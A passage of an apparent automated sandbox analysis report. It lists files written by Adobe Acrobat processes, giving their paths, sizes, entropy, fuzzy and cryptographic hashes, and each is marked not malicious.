SHA-256: | 01B520C367ADB58FEC378B7E02C6A652833AC92B9428FD0475C9CCB6D8D34B14 |
SHA-512: | 09543DFCD8E926BF2765E81E7C0AABC00E38301A793129493C0C7100A96A8A2A9039E7E12574AC4693BADB1041C5D4AE4438B4CFC0106578E569BF116822F3EF |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.178256942717358 |
Encrypted: | false |
SSDEEP: | 6:iO2X+q2PN72nKuAl9OmbnIFUtEVXZmw62NFNVkwON72nKuAl9OmbjLJ:7dvVaHAahFUtAX/XF5OaHAaSJ |
MD5: | 5D3381DD7FD13660FFE5CB0F16868DAF |
SHA1: | B85CB98282D9C0D40FEE9B51EADC5EDDC7AE4307 |
SHA-256: | 281EACB1D73D180FEFF41E653C9EDC2903651997A2C672C9D0AC77F1E33E3BA5 |
SHA-512: | BFB541E4F3C789B50C5A4341177D04C2A26AC000409296698581C966EEF837C9D2DEAAA4BD5DA25C98306F67ADE5371640F5A6317B108930960E3297ECD40379 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.178256942717358 |
Encrypted: | false |
SSDEEP: | 6:iO2X+q2PN72nKuAl9OmbnIFUtEVXZmw62NFNVkwON72nKuAl9OmbjLJ:7dvVaHAahFUtAX/XF5OaHAaSJ |
MD5: | 5D3381DD7FD13660FFE5CB0F16868DAF |
SHA1: | B85CB98282D9C0D40FEE9B51EADC5EDDC7AE4307 |
SHA-256: | 281EACB1D73D180FEFF41E653C9EDC2903651997A2C672C9D0AC77F1E33E3BA5 |
SHA-512: | BFB541E4F3C789B50C5A4341177D04C2A26AC000409296698581C966EEF837C9D2DEAAA4BD5DA25C98306F67ADE5371640F5A6317B108930960E3297ECD40379 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 339 |
Entropy (8bit): | 5.131650520397111 |
Encrypted: | false |
SSDEEP: | 6:iO2JvwQyq2PN72nKuAl9Ombzo2jMGIFUtEfAG1Zmw6fAQRkwON72nKuAl9Ombzos:7gvlyvVaHAa8uFUtuJ/A1R5OaHAa8RJ |
MD5: | F473CA1267EFD5F740E03A51DC9BBBC3 |
SHA1: | 3217ECD78DD4692B8AF71EE120CE5A24F57539FD |
SHA-256: | E909468C4C1EED710957558BEFBB82332D74AFD1596824C5D4057D8261B3437A |
SHA-512: | 46B7E3C531A1B289F7CDDA124C9F12943CE22B30C49A56CDF3A8537EC6EF379FC25E43459B022F3AD913172CF8B4C04D61D7C0B659D4BEBBCAD0776BD9474200 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 339 |
Entropy (8bit): | 5.131650520397111 |
Encrypted: | false |
SSDEEP: | 6:iO2JvwQyq2PN72nKuAl9Ombzo2jMGIFUtEfAG1Zmw6fAQRkwON72nKuAl9Ombzos:7gvlyvVaHAa8uFUtuJ/A1R5OaHAa8RJ |
MD5: | F473CA1267EFD5F740E03A51DC9BBBC3 |
SHA1: | 3217ECD78DD4692B8AF71EE120CE5A24F57539FD |
SHA-256: | E909468C4C1EED710957558BEFBB82332D74AFD1596824C5D4057D8261B3437A |
SHA-512: | 46B7E3C531A1B289F7CDDA124C9F12943CE22B30C49A56CDF3A8537EC6EF379FC25E43459B022F3AD913172CF8B4C04D61D7C0B659D4BEBBCAD0776BD9474200 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\82096a2f-6632-412e-ba8d-4cb5c63556d0.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.9729052853641855 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqsbyhsBdOg2Hrfcaq3QYiubcP7E4T3y:Y2sRds1pdMHy3QYhbA7nby |
MD5: | FA659441B12681F2E8DE147DF3DD0B2D |
SHA1: | 692FA4CBE8883881453D9B6BFE8D94C71ECE6377 |
SHA-256: | 7B88B9037BAF008AACB716DE3808D8671E0AEDFB6D5C1D2BC6364B8BE1DE9058 |
SHA-512: | 1F8578A5C5C3ACA7299EECE98C1E8D3E88CDF72085A4C775FA556275B506247E0AF21C757A9C9C7C81C6A4FE6B0C67BD90BC5428A2A69D4E23810203AB0C0DFF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.9729052853641855 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqsbyhsBdOg2Hrfcaq3QYiubcP7E4T3y:Y2sRds1pdMHy3QYhbA7nby |
MD5: | FA659441B12681F2E8DE147DF3DD0B2D |
SHA1: | 692FA4CBE8883881453D9B6BFE8D94C71ECE6377 |
SHA-256: | 7B88B9037BAF008AACB716DE3808D8671E0AEDFB6D5C1D2BC6364B8BE1DE9058 |
SHA-512: | 1F8578A5C5C3ACA7299EECE98C1E8D3E88CDF72085A4C775FA556275B506247E0AF21C757A9C9C7C81C6A4FE6B0C67BD90BC5428A2A69D4E23810203AB0C0DFF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5449 |
Entropy (8bit): | 5.247667517061701 |
Encrypted: | false |
SSDEEP: | 96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7p0doq:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhw |
MD5: | E63CEAAA277D932E106BFBCFDA801502 |
SHA1: | 22B7DB0C8D39DF60A2C4E12D3E228A0A797D3BDE |
SHA-256: | 3B7045CABF49996D3408C557773CDC30BF2C8D0C65957C6976DD96F070BC0C22 |
SHA-512: | 2FBB9C201615EAEC23FD179BA2D4AF1E8E5AA39B4BE461557528EABD35C14439620A1F884C35AF6D2767B2F9744FF633D4B7BEEDDF50D1F150746D2322786745 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 327 |
Entropy (8bit): | 5.112697219480211 |
Encrypted: | false |
SSDEEP: | 6:iO2FAQyq2PN72nKuAl9OmbzNMxIFUtEwG1Zmw6jeAQRkwON72nKuAl9OmbzNMFLJ:7O1yvVaHAa8jFUtQ/DR5OaHAa84J |
MD5: | 0785A0CAECAA63422941908B070EE432 |
SHA1: | 09A4FC2850524627473AE58AA617ACBE54FFBA34 |
SHA-256: | 3CB7DE7F13BE008F15317FC424296B7EF04822CE69516AA3341EBA5E21D44B64 |
SHA-512: | 3D3042E4DDD2CF3F76DC967C00AB2EA8B3FBE927BEB3F7E1C80536FE809471E15ABE2AADAFA4344EE03433942F275E7D26115519A871A8AF5F066DED14A9AC46 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 327 |
Entropy (8bit): | 5.112697219480211 |
Encrypted: | false |
SSDEEP: | 6:iO2FAQyq2PN72nKuAl9OmbzNMxIFUtEwG1Zmw6jeAQRkwON72nKuAl9OmbzNMFLJ:7O1yvVaHAa8jFUtQ/DR5OaHAa84J |
MD5: | 0785A0CAECAA63422941908B070EE432 |
SHA1: | 09A4FC2850524627473AE58AA617ACBE54FFBA34 |
SHA-256: | 3CB7DE7F13BE008F15317FC424296B7EF04822CE69516AA3341EBA5E21D44B64 |
SHA-512: | 3D3042E4DDD2CF3F76DC967C00AB2EA8B3FBE927BEB3F7E1C80536FE809471E15ABE2AADAFA4344EE03433942F275E7D26115519A871A8AF5F066DED14A9AC46 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.444483496544891 |
Encrypted: | false |
SSDEEP: | 384:Se7ci5t5iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:7as3OazzU89UTTgUL |
MD5: | A195A3941DFA12202EB950988CEC17A1 |
SHA1: | F71B58DAC15DEE326763FA10AEA8DC3A4B88B0B4 |
SHA-256: | DEBB29A2866B60BD39385CA75601F744C531D9F3E4C6D824F0869694E74B234E |
SHA-512: | 988C7CB705270A77FA5FD14A65D571C589B2C9AE112E22CDE74463728B5A68F73630AE08339FC9D00D5300E94D714FAB226720EFEDC9A246A16EB6AE2594C142 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2112373310555546 |
Encrypted: | false |
SSDEEP: | 24:7+th7JnuwKGqLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9w:7Mh1nCGqPmFTIF3XmHjBoGGR+jMz+LhK |
MD5: | 96EE0C37C0C69DAD638BF357164E499C |
SHA1: | B3DDF9CAC22B07E73A4BC8BE4FDB994B5B9DA210 |
SHA-256: | DD067D9E33AB1F33A4FE09A6ED36754B0CF7A067F95B7BDA448347F08A789D31 |
SHA-512: | F42392E0663801A0259DBF6E77BFAC4A16BBA51654EAEC3285D790FC20BD517FF2DAF006982713F17A0FABB5076D1EA2352762A6637955FE661B1EE88FF76317 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.728204828358771 |
Encrypted: | false |
SSDEEP: | 3:kkFklIzhAEl/tfllXlE/HT8k1hl1NNX8RolJuRdxLlGB9lQRYwpDdt:kKRzhAEteT86VNMa8RdWBwRd |
MD5: | 3161DB944EB62734A81F33DDF9D4064B |
SHA1: | 17F9426E37DC88BB8E8C4C600FEB0ED88DA8CD51 |
SHA-256: | EB0FD764A19A615E1CE8EFBE10D2437796734986F08F02BD96820A5A0B966820 |
SHA-512: | 784F042B1BFB3052CDB92F08D74E50F1C149E5CC7BFE3916BD610C0C5EDA85E3726443C0A7923C205B2CA140419791B5F43839344765B9766938699499ECE61E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.242990426783058 |
Encrypted: | false |
SSDEEP: | 6:kKYptL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:QptiDImsLNkPlE99SNxAhUe/3 |
MD5: | E30CFA1E16870EE56E4C78C8D24927B5 |
SHA1: | 975CB31A58FA52A57D15A5C4E6DC349D3DB39B53 |
SHA-256: | 566C3F47C32EB1A605D34F4794598259C30B92181D7A3B58669237EF05901A2C |
SHA-512: | 01812D72C90B11FB8ACAB59E0DB562C4769B81F51215FFD047D19AB0DC99786E12AC7DF2F51BC109984B3D49FE3A6CE1CAB250F992D405EC240C6849ABD9638F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.3527183944351355 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJKGnTcadCMmnZiQ0YGaLxoAvJM3g98kUwPeUkwRe9:YvXKXDTcWCMmcWiGMbLUkee9 |
MD5: | 0B9F9709E2F90C0ED2662383316DCC41 |
SHA1: | 0EFB8428D4410B4E672616B2BF1D3A72A5AC3EEB |
SHA-256: | 3076D21611A0976A043D4AE9AE6AD78EF1535057853A93E8F40D11BA737224EC |
SHA-512: | 799890FB72BDDA435D9BA4C9969A765FB1952B1CDC456F71469B74F3D8ABF20B1A0B3FD1D9E985D1E443A95850B961AD1EBD23B2E7934C7D426FB10D941BB819 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.305130030473406 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJKGnTcadCMmnZiQ0YGaLxoAvJfBoTfXpnrPeUkwRe9:YvXKXDTcWCMmcWiGWTfXcUkee9 |
MD5: | FBA6F42488242B8227B7359956D5E0B8 |
SHA1: | 6643F69EB8C706EF88EA40D403194E81EC2FE17B |
SHA-256: | 9B0E655D25954451EA56186BD4F90F511921BE21B154DD60EFB6C197DA33B0B7 |
SHA-512: | 14D0C74F4DADC653608A2025C71FB3B99389F9A343939B428D370D596D477D610FA07ED91B1ECFFDB8749B55D9AF5FBA0367E010D1522BAD43D88F8D31FF0036 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.282251472015983 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJKGnTcadCMmnZiQ0YGaLxoAvJfBD2G6UpnrPeUkwRe9:YvXKXDTcWCMmcWiGR22cUkee9 |
MD5: | DA9E30247549D1E9508288288503CC1F |
SHA1: | 4B0C3A1736817934C3C8BCBACFDA85011AD70A29 |
SHA-256: | A3A9292FF62C78ADBD7C61B17C355EB12477E3B8AAA1931034EA24A232BD005A |
SHA-512: | 7E287DEE420DE7D2ACA9A2B8E8E949E914D42618F1FAE463085F4B041724CFFF31467B101B3977E4A611EE3E0121A2CF0AE07CE05D3BB5875E8B3AAE59FE4F30 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.332367461611982 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJKGnTcadCMmnZiQ0YGaLxoAvJfPmwrPeUkwRe9:YvXKXDTcWCMmcWiGH56Ukee9 |
MD5: | D0C297189DA14F6FE4E0C371EC5BC15F |
SHA1: | 2744638183416D587D2D6F05C929FB13A9709FBB |
SHA-256: | 26AB9DAB2FAB9D4F3793D68A23DED9EA155A75B8411FC2CBB79ACF92E778265E |
SHA-512: | 290FEF508CE370C5644208899E86D60E92DB349CEE69E3F3D7F2FD154FF378231A3CDC5594DC851CAE793AF75803B53195B86798CC349F47EB5A9443FA87AA7E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.691822055450326 |
Encrypted: | false |
SSDEEP: | 24:Yv6XDDWfpLgE9cQx8LennAvzBvkn0RCmK8czOCCSQ:Yvcifhgy6SAFv5Ah8cv/Q |
MD5: | A56A8AD7A6C5D3111F445B83AC6BFF9D |
SHA1: | 9CE157354DAB909A6A1BA31687013FED7E0EEB10 |
SHA-256: | 6DFE04CF4DA8344D8D13E83A051A3CF57C7B04E05A44E4CA33C2F99A345DEBC6 |
SHA-512: | 2C012B252A125F3008D7F055791614BC5723CABCF08AA5A42C4F1B100BCDEAF9982DA8BC10865C7E7D3F23693D64F8843E36AB3B59DF15ED8B01256D5F68D315 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.283860493727306 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJKGnTcadCMmnZiQ0YGaLxoAvJf8dPeUkwRe9:YvXKXDTcWCMmcWiGU8Ukee9 |
MD5: | CD7975E7AF2B4CD35BDEC779A162E012 |
SHA1: | C93FCE4B61D3BC12C454C247BF6BEF3F6DA535AF |
SHA-256: | 0879BB073F4D6D573BB968843AD8F760A1BF3A20250E795672EDE65F1606D37D |
SHA-512: | C5EE89A025C3C0B668AF6AAE89B976895061738735480B3BCBE13B3BAC66EAE68517856BF063B8AA403A578E91F4FF82CAA7C4E8030156680A91B5AEDFB66FEB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.286330737878126 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJKGnTcadCMmnZiQ0YGaLxoAvJfQ1rPeUkwRe9:YvXKXDTcWCMmcWiGY16Ukee9 |
MD5: | 4767ED745FF88DCC94764E083870A74B |
SHA1: | 04B62BC7D8241551DA754896CC67F2A2B8F48899 |
SHA-256: | 4AAD1E482F466585D2612A11AFAE5E98DE39815A940F4EC9407CD58D7816FE00 |
SHA-512: | 4A05B4E19FD576AF2BBB60B4DA2D487F1D0FF9E6E46FB6B0008B48934BE06BC9B32F94CA4D6FEB888D62422897FE4D6D01FDA8A9E7DECC57A31E6F631233516E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.296605516063557 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJKGnTcadCMmnZiQ0YGaLxoAvJfFldPeUkwRe9:YvXKXDTcWCMmcWiGz8Ukee9 |
MD5: | FC5659FE9269D7EF2E7FAE5E8E243D14 |
SHA1: | 19B5FC1B0F76597A0F4827A1A614532AB1F3FE28 |
SHA-256: | 40B687022733DC4EAA5A3BD0ADC4D82EC59C7635A1B1E08B76B7D3702E4FBE38 |
SHA-512: | 31B9E6E58C9404930BD5493549F69DF03C521D284B9981755C97ECDE620599F9A19691A2A24FFE92DB0589D7FF166822456CDE18F05EF16B5D3E34B3D35848DB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.312976643095157 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJKGnTcadCMmnZiQ0YGaLxoAvJfzdPeUkwRe9:YvXKXDTcWCMmcWiGb8Ukee9 |
MD5: | 27D162E8E45BA316D5917DD9C088B678 |
SHA1: | 847FC35FB81256BF3695AF5A598D98AAD2C50CA0 |
SHA-256: | ED6677F21E8A3B3EA16FB2534886AE569C022CA2200AD73A43AAAB962E7BC6CB |
SHA-512: | 53BF8E23EA5BD404DA210041BFD0F53F13901C8281940C72BAD99610F2ABD03A88575E096C029382DBE023BE59C8A8A1C5FB5A17E79A181436E4A214EDA81791 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.292881761212185 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJKGnTcadCMmnZiQ0YGaLxoAvJfYdPeUkwRe9:YvXKXDTcWCMmcWiGg8Ukee9 |
MD5: | 0E7E36B04E0AF29832CB452A35B721EC |
SHA1: | 65C6214DAB73DF9B040AD8B6840D01B0301D3132 |
SHA-256: | 3E4B5C1E635A01B3E7D2F6C1CDA663FFEAFB9AD2105E0CF7F09AAC5FA801D81F |
SHA-512: | 6C8869B6A69F8158D094FE89F1E963D6C08A93D594CC63ACEE4E3B96FFF9A4418A5C83D3C1597ADA744BA00255CF79E11EA02C0504C105C1DD3E5160BEF79611 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.2788068129296395 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJKGnTcadCMmnZiQ0YGaLxoAvJf+dPeUkwRe9:YvXKXDTcWCMmcWiG28Ukee9 |
MD5: | 631410B17692E2DA4698F1F450FA113F |
SHA1: | E3CB3D5226F164197446CC9D06ABBDC33DD4C50D |
SHA-256: | C614E366D60B23431AA3C129FA75E4EDF8EDC351E5D61FFAF89B125988B44805 |
SHA-512: | 590CF2F4D12D9D3222430FEA9C4A2074B17F042BABA910DD75E19B44FFA3C5251C6379C522CCB6ACFD4078B02ED79AAEB48708A7DCC88B0B5136D62DA035B0DF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
